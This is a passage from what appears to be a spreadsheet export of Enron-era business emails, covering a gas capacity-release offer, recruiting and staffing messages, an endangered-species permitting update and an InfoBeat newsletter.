&lt;kferreira@NJNG.com&gt;, "Foard, Jean" &lt;JFoard@Coral-energy.com&gt;, "Foxen, Tim" _x000D_
&lt;tim.foxen@nrgenergy.com&gt;, "Franks, Ray" &lt;ray.franks@engageenergy.com&gt;, _x000D_
"Frezza, Christine" &lt;CFrezza@NUI.com&gt;, "Garant, Trish" _x000D_
&lt;Trish_Garant@perrygas.com&gt;, "Garner, Paul" &lt;pegarner@duke-energy.com&gt;, _x000D_
"Garofalow, Janet" &lt;jgarofalow@castlepower.com&gt;, "Gennarini, Rob" _x000D_
&lt;Rob.Gennarini@Conectiv.com&gt;, "Germany, Chris" &lt;Chris.Germany@enron.com&gt;, _x000D_
"Gizzilli, Mark" &lt;MarkG@Cook-Inlet.com&gt;, "Goodell, Scott" _x000D_
&lt;Scott.Goodell@enron.com&gt;, "Greco, John" &lt;john_greco@transcanada.com&gt;, _x000D_
"Gregson, Kurt" &lt;kgregson@utilicorp.com&gt;, "Holub, Karen" _x000D_
&lt;Karen.E.Holub@usa.conoco.com&gt;, "Horowitz, Saul" &lt;saulh@econnergy.com&gt;, _x000D_
"Irwin, Rob" &lt;rirwin@sempratrading.com&gt;, "Jacobini, Charles" _x000D_
&lt;charles.jacobini@acnenergy.com&gt;, "Jacomini, Tommy" _x000D_
&lt;TJacomini@sempratrading.com&gt;, "Jendras, Chris" &lt;jendrasc@conedenergy.com&gt;, _x000D_
"Jessop, Michael" &lt;michael_jessop@vapower.com&gt;, "Johnson, Criss" _x000D_
&lt;Johns00@texaco.com&gt;, "Jornayvaz, Paul" &lt;varifuel@neosoft.com&gt;, "Kain, Terry" _x000D_
&lt;tkain@worldnet.att.net&gt;, "Karlovic, Mario" &lt;karlovicm@conedenergy.com&gt;, _x000D_
"Keran, Tina" &lt;tkeran@reliantenergy.com&gt;, "Kozak, Anna" _x000D_
&lt;gasmaster@worldnet.att.net&gt;, "Krauser, Ryan" &lt;ryan.krauser@nrgenergy.com&gt;, _x000D_
"Levy, Robert" &lt;metroenergy@worldnet.att.net&gt;, "Lombardi, Charles" _x000D_
&lt;clombardi@advanix.net&gt;, "McCartney, Bill" &lt;Mccarwh@texaco.com&gt;, "Morris, _x000D_
Laurence" &lt;lsmorris@metromediaenergy.com&gt;, "Mueller, Dave" _x000D_
&lt;dmueller@sempratrading.com&gt;, "Murray, Bruce" &lt;bmurray@pwrteam.com&gt;, _x000D_
"Muscarello, Tony" &lt;Tony.Muscarello@CESOURCE.com&gt;, "Naeser, Martha" _x000D_
&lt;mnaeser@naenergy.com&gt;, "Nollenberger, Matt" &lt;mwnollenberger@aep.com&gt;, _x000D_
"Nunziato, Carl" &lt;carl.nunziato@southernenergy.com&gt;, "Phillip, Terryl" _x000D_
&lt;terryl.m.filip@usa.conoco.com&gt;, "Prestia, Jay" _x000D_
&lt;jayprestia@worldnet.att.net&gt;, "Profitt, Scott" &lt;sdpr@dynegy.com&gt;, "Quartier, _x000D_
Sandy" &lt;quartiersm@nmenergy.com&gt;, "Rallison, Matthew" _x000D_
&lt;matt_rallison@transcanada.com&gt;, "Ross, Lynn" &lt;Lross@allenergy.com&gt;, _x000D_
"Schiavi, Julia" &lt;jschiavi@hess.com&gt;, "Silbert, David" _x000D_
&lt;SILBER2D@KochiND.com&gt;, "Skipton, Mary" &lt;enrgn@aol.com&gt;, "Smith, Dave" _x000D_
&lt;dave_smith@oxy.com&gt;, "Smith, Maureen" &lt;maureen.smith@enron.com&gt;, _x000D_
"Stephenson, Lori" &lt;lstephenson@reliantenergy.com&gt;, "Streed, Darryl" _x000D_
&lt;dstreed@naenergy.com&gt;, "Sullivan, Skip" &lt;crabtax@aol.com&gt;, "Sweeney, Eileen" _x000D_
&lt;NAU87@aol.com&gt;, "Swift, Brad" &lt;brad_swift@transcanada.com&gt;, "Tate, Paul" _x000D_
&lt;ptate@enron.com&gt;, "Tennariello, Vincent" &lt;Vincent.tennariello@pseg.com&gt;, _x000D_
"Toczyl, James" &lt;JTOZZ@aol.com&gt;, "Townsend, Judy" &lt;Judy.Townsend@enron.com&gt;, _x000D_
"Wagner, Chad" &lt;CJWA@dynegy.com&gt;, "Winans, Amy" &lt;awinans@njresources.com&gt;, _x000D_
"Ziober, Ken" &lt;kziober@duke-energy.com&gt;_x000D_
cc: David S Stryker &lt;dstryker@keyspanenergy.com&gt;, Mark J Leippert _x000D_
&lt;mleippert@keyspanenergy.com&gt; _x000D_
Subject: CAPACITY OFFER_x000D_
_x000D_
_x000D_
KeySpan Energy may be interested in releasing additional capacity for_x000D_
September, 2000._x000D_
_x000D_
READ THE ATTACHMENT FOR DETAILS ASSOCIATED WITH THIS OFFER._x000D_
_x000D_
NOTE:  I WILL BE ON VACATION._x000D_
_x000D_
PLEASE FAX ALL BIDS DUE ON MONDAY, AUGUST 28TH BY 3:00 PM, EST._x000D_
_x000D_
FAX BIDS TO:_x000D_
DAVE STRYKER - FAX #:   (516) 545-5468_x000D_
PHONE #: (515) 545-5415_x000D_
_x000D_
_x000D_
 - Offer1.doc_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Mar 2002 11:46:33 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'samuels@amerigas.com'})</t>
  </si>
  <si>
    <t>RE: Call</t>
  </si>
  <si>
    <t>Sounds good.  I have a few fires but I will call you at 3 (your time) and I have until 2:30.  Sara_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Samuel, Steven" &lt;SamuelS@amerigas.com&gt;@ENRON  _x000D_
Sent:	Wednesday, March 06, 2002 1:40 PM_x000D_
To:	Shackleton, Sara_x000D_
Subject:	Call_x000D_
_x000D_
Per my voicemail, how about speaking in 20 minutes (3:00 my time) or 4:00 my_x000D_
time?  If these don't work, please let me know what works for you tomorrow._x000D_
I'm wide open on Thursday.  Thanks.</t>
  </si>
  <si>
    <t>Thu, 14 Sep 2000 09:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sheetal.patel@enron.com'})</t>
  </si>
  <si>
    <t>Enron Presentation</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Susan M Scott/HOU/ECT on 09/14/2000 04:18 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Lexi Elliott @ ENRON                           09/12/2000 01:05 PM_x000D_
	_x000D_
_x000D_
To: Stan Dowell/HOU/EES@EES, Elizabeth Atkinson/Corp/Enron@ENRON, Sally _x000D_
Beck/HOU/ECT@ECT, Mike McConnell/HOU/ECT@ECT, Edward Coats/Corp/Enron@ENRON, _x000D_
Steven J Kean/NA/Enron@Enron, Ethan Schultz/Enron Communications@Enron _x000D_
Communications, Alejandro Hernandez/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Richard Causey/Corp/Enron@ENRON, Harold G Buchanan/HOU/EES@EES, Rogers _x000D_
Herndon/HOU/ECT@ect, David Shields/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Peter _x000D_
N Anderson/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Rob G Gay/NA/Enron@Enron, Tom _x000D_
Swank/HOU/ECT@ECT, Mike Layne/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Marshall _x000D_
Eubank/HOU/ECT@ECT, Gary Maestas/OTS/Enron@ENRON, Jim _x000D_
Davoli/Corp/Enron@ENRON, Deirdre McCaffrey/HOU/ECT@ECT, TJ Rylander/Enron _x000D_
Communications@Enron Communications, Priya Jaisinghani/Enron _x000D_
Communications@Enron Communications, Jonathan Roumel/Enron _x000D_
Communications@Enron Communications, Todd Van Roten/HOU/ECT@ECT, Matthew _x000D_
Arnold/HOU/ECT@ECT, Elizabeth Tilney/HOU/EES@EES, Chuck Randall/HOU/EES@EES, _x000D_
Brad Alford/ECP/HOU/ECT@ECT, John Henderson/HOU/EES@EES, Mark _x000D_
Courtney/HOU/ECT@ECT, Derryl Cleaveland/NA/Enron@ENRON, Larry _x000D_
Abbott/OTS/Enron@ENRON, Mo Bawa/Enron Communications@Enron Communications, _x000D_
Chris Loehr/HOU/ECT@ECT, James Pyke/AP/Enron@Enron, Ken Tate/Enron _x000D_
Communications@Enron Communications, John King/HOU/ECT@ECT, Hans Oliver _x000D_
Pereira/HOU/EES@EES, James Scribner/Corp/Enron@Enron, Tamara _x000D_
Hopkins/ET&amp;S/Enron@ENRON, Patrick Wade/HOU/ECT@ECT, Patrick _x000D_
Cunningham/HOU/EES@EES, Mark McConnell/Enron Communications@Enron _x000D_
Communications, Ronnie Shields/HOU/EES@EES, Eric Moon/HOU/ECT@ECT, Stephen _x000D_
Plauche/Corp/Enron@Enron, Angie Zeman/Corp/Enron@ENRON, Justin _x000D_
O'Malley/HOU/EES@EES, Jody Crook/Corp/Enron@ENRON, Patrick Maloy/HOU/ECT@ECT, _x000D_
Rafael Avila/HOU/EES@EES, Nate Blackburn/NA/Enron@Enron, Mark E _x000D_
Lindsey/GPGFIN/Enron@ENRON, Craig Breslau/HOU/ECT@ECT, Cedric _x000D_
Burgher/Corp/Enron@ENRON, Rick L Carson/HOU/ECT@ECT, Brent A _x000D_
Price/HOU/ECT@ECT, Hunter S Shively/HOU/ECT@ECT, Lisa B Cousino/HOU/ECT@ECT, _x000D_
Marshall Eubank/HOU/ECT@ECT, Mary Lynne Ruffer/HOU/ECT@ECT, Mark _x000D_
Confer/HOU/ECT@ECT, Lanette Earnest/Corp/Enron@ENRON, Jim _x000D_
Cole/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Christopher _x000D_
Coffman/Corp/Enron@Enron, David Yang/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Leon Branom/Corp/Enron@ENRON, Zeina El-Azzi/Corp/Enron@ENRON, Christine _x000D_
Milliner/Houston/Eott@Eott, Susan M Scott/HOU/ECT@ECT, Millie _x000D_
Gautam/HOU/EES@EES_x000D_
cc: Donna Hutton/Corp/Enron@Enron, Cathy Phillips/HOU/ECT@ECT, Maureen _x000D_
McVicker/NA/Enron@Enron, Sharron Westbrook/Corp/Enron@ENRON, Beverly _x000D_
Aden/HOU/EES@EES _x000D_
Subject: Enron Presentation_x000D_
_x000D_
Dear Recruiting Team Members:_x000D_
_x000D_
I am forwarding a copy of the Enron presentation to each of you for review.  _x000D_
Some of you will be asked to do presentations, many will not.  I just wanted _x000D_
to send it out to various team members in order to give you an idea of our _x000D_
marketing strategy and information on campus.  This is simply for your _x000D_
information.  When this presentation is given, it will include  dates _x000D_
tailored specifically for each campus based on the dates I have set up _x000D_
through career services._x000D_
_x000D_
Have a great day!_x000D_
_x000D_
_x000D_
_x000D_
Lexi Elliott_x000D_
3-4585_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 01:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Staff req form</t>
  </si>
  <si>
    <t xml:space="preserve">The position will actually report to me.  You can change it.  Thanks._x000D_
_x000D_
DG    3-9573_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Toni Graham @ ENRON                           11/29/2000 08:14 PM_x000D_
	_x000D_
_x000D_
To: Darron C Giron/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Staff req form  _x000D_
_x000D_
Darron,  your req number is:  106820.     Is this position reporting to you _x000D_
or Jeff?    If you, I'd like to change it on the req. _x000D_
_x000D_
I will forward resumes to you asap. _x000D_
_x000D_
toni_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Darron C Giron @ ECT                           11/29/2000 01:53 PM_x000D_
	_x000D_
_x000D_
To: Toni Graham/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Staff req form  _x000D_
_x000D_
Toni,_x000D_
Please let me know if I left anything out.  Thanks for your help._x000D_
_x000D_
DG    3-9573_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 4 Jan 2002 14:27:15 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: estate list</t>
  </si>
  <si>
    <t>As of now I should have no employees on the Estate list.  Israel Estrada was on the list previously, but we have moved him to Power Global Rates in Netco._x000D_
_x000D_
Stacey_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hall, Bob M  _x000D_
Sent:	Friday, January 04, 2002 1:39 PM_x000D_
To:	Gossett, Jeffrey C.; Reeves, Leslie; White, Stacey W.; Hedstrom, Peggy; Superty, Robert_x000D_
Subject:	estate list_x000D_
_x000D_
I know we have all been worring about the Netco list.  _x000D_
_x000D_
Can you please send me who you think is still here and on the estate list._x000D_
_x000D_
I just want to check my lists.  (Maybe I can get a job as Santa next year check lists)._x000D_
_x000D_
thanks_x000D_
_x000D_
bob</t>
  </si>
  <si>
    <t>Wed, 19 Sep 2001 14:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>T&amp;E species update - Red Rock Mainline Expansion</t>
  </si>
  <si>
    <t xml:space="preserve">As an update to many of you, I have been on the phone with Roger Kohn of EPA_x000D_
Region 9 a couple of different times today.  It turns out that what they_x000D_
really were expecting to see was something more like a formal Biological_x000D_
Assessment (BA) for CS 3 and CS 4, not a biological survey report like we_x000D_
provided.  According to the Endangered Species Act (ESA), the lead Federal_x000D_
agency in a Federal Action is responsible for preparing the BA, but a BA is_x000D_
typically only required when the action "may affect" a listed species, which_x000D_
is not the case here.  EPA Region 9, and based on our experience across the_x000D_
country, apparently only Region 9, is interpreting their responsibilities_x000D_
under the ESA very strictly and somewhat "oddly."  Regardless, the bottom_x000D_
line is that it appears we could argue with them ad nauseum and still end up_x000D_
right back here.  So, we have begun working very quickly and diligently to_x000D_
put together a "BA-like" document that, according to Roger, will give them_x000D_
what they need to put in their files to cover themselves for satisfying the_x000D_
ESA._x000D_
_x000D_
I told him that the USFWS typically (under "normal" circumstances) receives_x000D_
a BA from the lead federal agency and then issues their Biological Opinion_x000D_
(BO).  I asked him if they (EPA) were going to still feel like they needed_x000D_
any kind of concurrence from the USFWS.  He said that only if we were going_x000D_
to have any findings of "may affect" would they maybe feel the need to get_x000D_
additional concurrence from the USFWS.  I told him that you (Larry) already_x000D_
have a verbal concurrence from USFWS that there are no issues, in addition_x000D_
to the fact that our surveys confirmed that.  I told him that our "BA-like"_x000D_
document is going to come to the same conclusions that our Survey Report did_x000D_
(i.e., No Effect).  He said that he understands, and will likely just_x000D_
receive the document, assure himself that it says what it needs to say, and_x000D_
is formatted in the manner he feels it needs to be formatted, put it in his_x000D_
files, and put out the Public Notice for a 30-day comment period.  If this_x000D_
all happens by early next week, we should still have permits by the_x000D_
beginning of November. I will continue to hammer home the importance of that_x000D_
schedule.  Some of us will be on a conference call with Roger and one of the_x000D_
EPA attorneys tomorrow to try to "get inside their heads" a little bit_x000D_
better regarding why they are the only Region interpreting their ESA_x000D_
responsibilities so strictly.  We will debrief you after the call.  Scott_x000D_
_x000D_
Scott J. Patti_x000D_
Senior Project Manager_x000D_
ENSR International_x000D_
1601 Prospect Parkway_x000D_
Fort Collins, CO  80525_x000D_
Phone: (970) 493-8878_x000D_
Fax:     (970) 493-0213_x000D_
Email:  spatti@ensr.com_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Larry.Campbell@enron.com [mailto:Larry.Campbell@enron.com]_x000D_
Sent: Friday, August 31, 2001 4:18 PM_x000D_
To: Patti, Scott_x000D_
Cc: John.Shafer@enron.com; Hackett, Terry; William.Kendrick@enron.com;_x000D_
Robert.Kilmer@enron.com; Louis.Soldano@enron.com; Alstad, Jon;_x000D_
Richardson, Devyn_x000D_
Subject: RE: Endangered Species Surveys, Red Rock Expansion_x000D_
_x000D_
_x000D_
_x000D_
Scott, thanks for the effort in this.  Am looking forward to your reports_x000D_
for sta. 3 and 4 at your earliest convenience ...._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Patti, Scott" &lt;SPatti@ensr.com&gt; on 08/31/2001 02:11:17 PM_x000D_
_x000D_
To:   "'Larry.Campbell@enron.com'" &lt;Larry.Campbell@enron.com&gt;,_x000D_
      John.Shafer@enron.com_x000D_
cc:   "Hackett, Terry" &lt;THackett@ENSR.com&gt;, William.Kendrick@enron.com,_x000D_
      Robert.Kilmer@enron.com, Louis.Soldano@enron.com, "Alstad, Jon"_x000D_
      &lt;JAlstad@ensr.com&gt;, "Richardson, Devyn" &lt;DRichardson@ensr.com&gt;_x000D_
_x000D_
Subject:  RE: Endangered Species Surveys, Red Rock Expansion_x000D_
_x000D_
_x000D_
Gentlemen,_x000D_
_x000D_
Our Navajo Nation Permit to conduct T&amp;E species surveys just came across on_x000D_
the fax machine.  Again, Jon Alstad will be traveling Tuesday and_x000D_
conducting_x000D_
the surveys on Wednesday.  Thanks to Devyn Richardson for expediting_x000D_
receipt_x000D_
of this permit._x000D_
_x000D_
Scott_x000D_
_x000D_
Scott J. Patti_x000D_
Senior Project Manager_x000D_
ENSR International_x000D_
1601 Prospect Parkway_x000D_
Fort Collins, CO  80525_x000D_
Phone: (970) 493-8878_x000D_
Fax:     (970) 493-0213_x000D_
Email:  spatti@ensr.com_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Larry.Campbell@enron.com [mailto:Larry.Campbell@enron.com]_x000D_
Sent: Friday, August 31, 2001 1:24 PM_x000D_
To: John.Shafer@enron.com_x000D_
Cc: Hackett, Terry; William.Kendrick@enron.com; Robert.Kilmer@enron.com;_x000D_
Louis.Soldano@enron.com; Patti, Scott_x000D_
Subject: RE: Endangered Species Surveys, Red Rock Expansion_x000D_
_x000D_
_x000D_
_x000D_
John, to my knowledge there are no ciritical habitats at either site.  In_x000D_
my previous life as a consultant I did a considerable amount of work with_x000D_
ESA in NM and AZ and on reservation lands.  To add to this, the whole_x000D_
disturbance issue of compressor station activities from 1967 (sta. 2) and_x000D_
1959 (sta.3) would strongly support your supposition that there wont be any_x000D_
surprises.  Ive spoken to Region IX EPA and this issue wont delay the_x000D_
processing of the permits for either station.  I would think that from the_x000D_
time the reports are completed to clearnace by the Navajo Nation, would be_x000D_
about 30 days.  That is the approximate time limit  that the SHPO_x000D_
clearances received.  Again, weve received verbal clearance from the Navajo_x000D_
Nation at these sites regarding T&amp;Es.  The project start point is station_x000D_
2, so we have some room in the event the survey approvals take longer than_x000D_
30 days, but I agree with you that we need to move this along.  Ill be more_x000D_
than happy to motivate the Navajos and EPA after the reports are_x000D_
submitted.....Scott Patti has promised me he would let me know when the_x000D_
Navajos have said "yes" and he would charge into the field and do the_x000D_
surveys._x000D_
_x000D_
_x000D_
_x000D_
From: John Shafer/ENRON@enronXgate on 08/28/2001 02:59 PM CDT_x000D_
_x000D_
To:   Larry Campbell/ET&amp;S/Enron@ENRON, "Hackett, Terry" &lt;THackett@ENSR.com&gt;_x000D_
      @SMTP@enronXgate_x000D_
cc:   William Kendrick/ENRON@enronXgate, Robert Kilmer/ENRON@enronXgate,_x000D_
      Louis Soldano/ENRON@enronXgate_x000D_
_x000D_
Subject:  RE: Endangered Species Surveys, Red Rock Expansion_x000D_
_x000D_
Larry,_x000D_
Please proceed with all haste on this.  How long to complete them and_x000D_
submit the findings (can't believe there would be anything turn up).  No_x000D_
endangered plants in any of those station yards - I trust?  The EPA is_x000D_
reaching here, but they have the big stick and we must work through this to_x000D_
get the air permit.  This is a lesson's learned for the upcoming Sun Devil_x000D_
project.  John_x000D_
_x000D_
    -----Original Message-----_x000D_
   From:   Campbell, Larry_x000D_
   Sent:   Monday, August 27, 2001 4:32 PM_x000D_
   To:     Hackett, Terry_x000D_
   Cc:     Shafer, John; Kendrick, William_x000D_
   Subject:  Re: Endangered Species Surveys, Red Rock Expansion_x000D_
_x000D_
     The issue arose when the EPA in San Francisco said they would not_x000D_
     issue an air permit unless we had addressed all concerns relevant to_x000D_
     the endangered species act, even on distsurbed lands at stations 3 and_x000D_
     4.  Even though we had received a verbal approval formt he Navajo_x000D_
     Nation that endangered species would not be a concern by the Nation,_x000D_
     the EPA felt otherwise.  This means that they wont give us a permit_x000D_
     until we do a survey for plants and animals.  Because ENSR was on the_x000D_
     list of contractors approved by the Navajo Nation, they were given the_x000D_
     opportunity.  As you know, I have been working with Scott Patti on_x000D_
     this and we have worked it through.  All that is left is to get the_x000D_
     ENSR renewal permit application approved by the Nation and ENSR is off_x000D_
     and running to do the surveys.  Terry, I know that you know all this,_x000D_
     I just wanted to keep John and Bill in the loop on how things are_x000D_
     progressing......_x000D_
_x000D_
_x000D_
_x000D_
     (Embedded image moved to file: pic13261.pcx)_x000D_
     "Hackett, Terry" &lt;THackett@ENSR.com&gt; on 08/27/2001 11:18:31 AM_x000D_
_x000D_
     To:   "Larry Campbell (E-mail)" &lt;Larry.Campbell@ENRON.com&gt;_x000D_
     cc:   "Patti, Scott" &lt;SPatti@ensr.com&gt;_x000D_
_x000D_
     Subject:  Endangered Species Surveys, Red Rock Expansion_x000D_
_x000D_
_x000D_
     Larry,_x000D_
_x000D_
     I understand from Scott Patti that the EPA has thrown a monkey wrench_x000D_
     into_x000D_
     the air permitting process for stations 3 and 4 and are now requesting_x000D_
     endangered species surveys.  For simplicity, we will add this as a new_x000D_
     task_x000D_
     for the Red Rock Expansion project.  The FT. Collins folks are_x000D_
     proceeding_x000D_
     based on your verbal go ahead, but to make our accountants happy, I_x000D_
     will_x000D_
     have to get something written authorizing the additional work.  Scott_x000D_
     is_x000D_
     estimating the task to cost approximately $7,000.  Since I am listed_x000D_
     as the_x000D_
     project manager on paper, I will put together a brief letter and get_x000D_
     it to_x000D_
     you this week.  However, please continue to directly coordinate with_x000D_
     Scott_x000D_
     and he will keep me apprised of the status._x000D_
_x000D_
     Thanks,_x000D_
_x000D_
     Terry._x000D_
_x000D_
_x000D_
_x000D_
     Terry L. Hackett_x000D_
     Senior Project Manager_x000D_
     ENSR International_x000D_
     7041 Old Wake Forest Road, Suite 103_x000D_
     Raleigh, NC 27616-3013_x000D_
     (919) 872-6600 phone_x000D_
     (919) 872-7996 fax_x000D_
_x000D_
_x000D_
_x000D_
     **********************************************************************_x000D_
     The information contained in this communication is confidential and_x000D_
     privileged proprietary information intended only for the individual_x000D_
     or entity to whom it is addressed.  Any unauthorized use,_x000D_
     distribution,_x000D_
     copying or disclosure of this communication is prohibited._x000D_
     If you have received this communication in error, please contact the_x000D_
     sender immediately._x000D_
_x000D_
     It is our policy that e-mails are intended for and should be used for_x000D_
     business purposes only._x000D_
_x000D_
     This footnote also confirms that this email message has been swept by_x000D_
     MIMEsweeper for the presence of computer viruses._x000D_
_x000D_
     ENSR_x000D_
     www.ensr.com_x000D_
     postmaster@ensr.com_x000D_
     **********************************************************************_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
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t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 13:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bruce.s.grant@lmco.com'})</t>
  </si>
  <si>
    <t>Vegas</t>
  </si>
  <si>
    <t>So did you get comped on the room/meals?  If not, what's my share of Elements and Commander's Palace.  I ended up about $300 in the money, a little less than the hotel room.  I didn't try to get comped because I know I didn't gamble enough.  But let me know how they treated you..._x000D_
_x000D_
Scott</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 13:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'fun@infobeat.com'})</t>
  </si>
  <si>
    <t>InfoBeat Fun - Daily Dose - 12/01/2000</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
	_x000D_
	_x000D_
	logoInfoBeat: Don't miss a beat!_x000D_
	Daily Dose_x000D_
	[IMAGE]_x000D_
	_x000D_
[IMAGE]	_x000D_
	_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	_x000D_
	_x000D_
	_x000D_
	InfoBeat HomeUser Profile_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	DATE_x000D_
	[IMAGE]_x000D_
	Friday, December 01, 2000_x000D_
	[IMAGE]_x000D_
	_x000D_
	[IMAGE]_x000D_
	_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	_x000D_
	[IMAGE]_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	InfoBeat Fun - Daily Dose - 12/01/2000_x000D_
	_x000D_
	 Cool Site of the Day _x000D_
	Fact of the Day _x000D_
	Joke of the Day _x000D_
	Quote of the Day _x000D_
	Born Today _x000D_
	_x000D_
	[IMAGE]_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	Click on Ad -- Support InfoBeat's Free Services_x000D_
	_x000D_
	_x000D_
	_x000D_
	 _x000D_
	_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]Cool Site of the Day_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	_x000D_
	_x000D_
	_x000D_
	You wanna get smart? Well stop talking into your shoe and log onto the Weekly _x000D_
Dose of Architecture. This is a great looking, easy to comprehend site that _x000D_
will certify you as an architecture buff in a very short while. New images _x000D_
are uploaded each Monday with some brief text to go along with them, and the _x000D_
old stuff gets archived so you can catch up in your free time. Most of the _x000D_
work here is contemporary so if you're looking for anything else, simply _x000D_
click on "links" to explore. Architecture has never been so easy! _x000D_
http://www.internettrash.com/users/archidose/main.html_x000D_
	_x000D_
	[IMAGE]_x000D_
	_x000D_
	back to top _x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]Fact of the Day_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	_x000D_
	_x000D_
	_x000D_
	Many believe the potato chip was born in 1853 in a restaurant in Saratoga _x000D_
Springs, N.Y. when a picky customer complained about the thickness of his _x000D_
fried potatoes. When the potatoes were returned to wise guy cook, George Crum _x000D_
he sliced some potatoes as thinly as possible, fried them and sent them back _x000D_
to the customer. To his surprise the man loved them. For more, click here._x000D_
	_x000D_
	[IMAGE]_x000D_
	_x000D_
	back to top _x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]Joke of the Day_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	_x000D_
	_x000D_
	The Long Hack Veil_x000D_
	Jennifer visited a psychic of some local repute. _x000D_
	_x000D_
	In a dark and hazy room, peering into a crystal ball, the mystic delivered _x000D_
grave news: _x000D_
	_x000D_
	"There's no easy way to say this, so I'll just be blunt - prepare yourself to _x000D_
be a widow. Your husband will die a violent and horrible death this year." _x000D_
	_x000D_
	Visibly shaken, Jennifer stared at the woman's lined face, then at the single _x000D_
flickering candle, then down at her hands. She took a few deep breaths to _x000D_
compose herself. _x000D_
	_x000D_
	She simply had to know. She met the fortune teller's gaze, steadied her _x000D_
voice, and asked: _x000D_
	_x000D_
	"Will I be acquitted?" _x000D_
	_x000D_
	For more jokes, click Joke-Of-The-Day.com_x000D_
	_x000D_
	[IMAGE]_x000D_
	_x000D_
	back to top _x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]Quote of the Day_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
